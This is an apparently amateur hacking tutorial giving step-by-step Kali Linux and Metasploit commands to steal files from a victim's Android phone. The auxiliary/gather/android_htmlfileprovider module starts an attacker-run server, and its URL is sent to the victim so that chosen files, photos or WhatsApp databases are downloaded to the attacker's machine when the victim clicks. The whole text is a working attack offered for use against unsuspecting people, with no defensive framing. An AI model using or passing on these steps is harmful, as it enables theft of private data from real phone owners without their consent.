Steal File From Any Android Phone With Kali Linux/ BackTrack

In This Tutorial  i am goint to teach you that how can we steal file from android with The help of backtrack or kali linux ! You can even steal a pics and Whatsapp databses From
Victims Phone !
So Letus Start

  • Open Kali Linux/ Backtrack
  • Type: Service Postgresql start
    it will start a Postgresql service in your Computer
  • Type: Service Metasploit start
    it will start Metasploit service in Your Pc
  • Now Type : Msfconsole and Hit Enter
  • Now wait Some time Until The Metasploit console in Successfully Opened
  • Now Type: Search android
  • Now Tyep: use auxiliary/gather/android_htmlfileprovider
  • Now Type : show options
  • Now type : set SRVHOST -[replace with Your Ip address]
  • Now Type: Set SRVPORT 8080
  • Now Type : set URIPATH /
  • Now Type : Set FILE /proc/version , /proc/self/status
    Enter The Address Of That Files You Want Steal From Victims Phone
  • Now type: Exploit
  • Now The server will be started in your computer on port 8080
  • Now Simple Send The URL to Victim
    The server will Provide a Url While starting if Not It will be
  • But In Your Case It will Be Like Http://your-ip-address:8080/
  • Now send this Url to Victim
  • And Wait until He/she will click on your Link
  • When Victim Clicks On Your Link 
  • The mentioned Files will be Downloaded Into Your System '
  • BOOM ! Enjoy And Exploit